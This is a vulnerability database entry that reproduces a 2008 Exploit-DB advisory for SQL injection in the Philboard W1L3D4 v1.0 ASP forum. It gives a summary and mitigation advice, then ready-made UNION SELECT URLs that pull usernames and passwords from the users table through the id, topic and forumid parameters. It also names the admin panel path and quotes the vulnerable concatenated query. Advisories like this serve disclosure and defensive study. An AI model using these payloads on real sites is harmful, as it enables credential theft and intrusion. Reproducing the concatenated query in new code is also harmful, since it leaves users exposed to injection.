Philboard W1L3D4 v1.0 Multiple SQL Injection Vulnerable

vendor:

Philboard W1L3D4

by:

U238

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Philboard W1L3D4

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: N/A

CPE: a:philboard:philboard_w1l3d4:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Philboard W1L3D4 v1.0 Multiple SQL Injection Vulnerable

Philboard W1L3D4 v1.0 is vulnerable to multiple SQL injection attacks. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. This can be done by sending malicious input to the 'id' and 'recordnum' parameters in the philboard_reply.asp and philboard_newtopic.asp files. An attacker can also access the admin panel by sending malicious input to the 'forumid' parameter in the philboard_newtopic.asp file.

Mitigation:

Input validation should be used to prevent malicious SQL queries from being sent to the application. The application should also be configured to use parameterized queries.

Source

Exploit-DB raw data:

Philboard W1L3D4 v1.0  Multiple SQL Ä°njection Vulnerable

Author : U238 

mail   : setuid.noexec0x1[aq]hotmail[dot]com

webpage: http://noexec.blogspot.com


Script : http://www.aspindir.com/Goster/4703

Script2: http://rapidshare.de/files/39107179/philboardtrge.zip.html

-_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_


[0x1] Exploit:

http://localhost:2222/lab/philboard/philboard_reply.asp?id=1+union+select+0,1,2,3,4,5,6,7,8,username,1,9,0,1,2+from+users

http://localhost:2222/lab/philboard/philboard_reply.asp?id=1+union+select+0,1,2,3,4,5,6,7,8,password,1,9,0,1,2+from+users

*
http://localhost:2222/lab/philboard/philboard_reply.asp?topic=1+union+select+0,username,2,3,4,5,6+from+users

http://localhost:2222/lab/philboard/philboard_reply.asp?topic=1+union+select+0,password,2,3,4,5,6+from+users



-----------------------


http://localhost:2222/lab/philboard/philboard_newtopic.asp?forumid=1+union+select+0,password,2,3,4,5+from+users

http://localhost:2222/lab/philboard/philboard_newtopic.asp?forumid=1+union+select+0,username,2,3,4,5+from+users


-_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_-

[0x2] Admin Panel


target/philboard/philboard_admin.asp





[0x3] Error File : 

philboard_newtopic.asp

philboard_reply.asp


[0x3] Error Code : 


id = Request.QueryString("id")

recordnum = Request.QueryString("recordnum")

sql = "SELECT replies.*, forums.*, topics.locked FROM (forums INNER JOIN topics ON forums.forumid = topics.forum) INNER JOIN replies ON topics.id = replies.root WHERE replies.id = " & id




                                     [-] Patched ? [-] 

id = Request.QueryString("id")
IF Not IsNumeric(request.querystring("id")) THEN
Response.write "sql injection mu arÄ±yon yawrucum,anam? !!" 
Response.End
END IF

* This Code  , application make to included error file.. 




------------------------------
[0x4] Greatz: The_BekiR - ka0x - Ferruh Mavituna - fahn - sersak

[0x5] U238 | Web - Designer Developer Solutions

-----------------------------

# milw0rm.com [2008-04-20]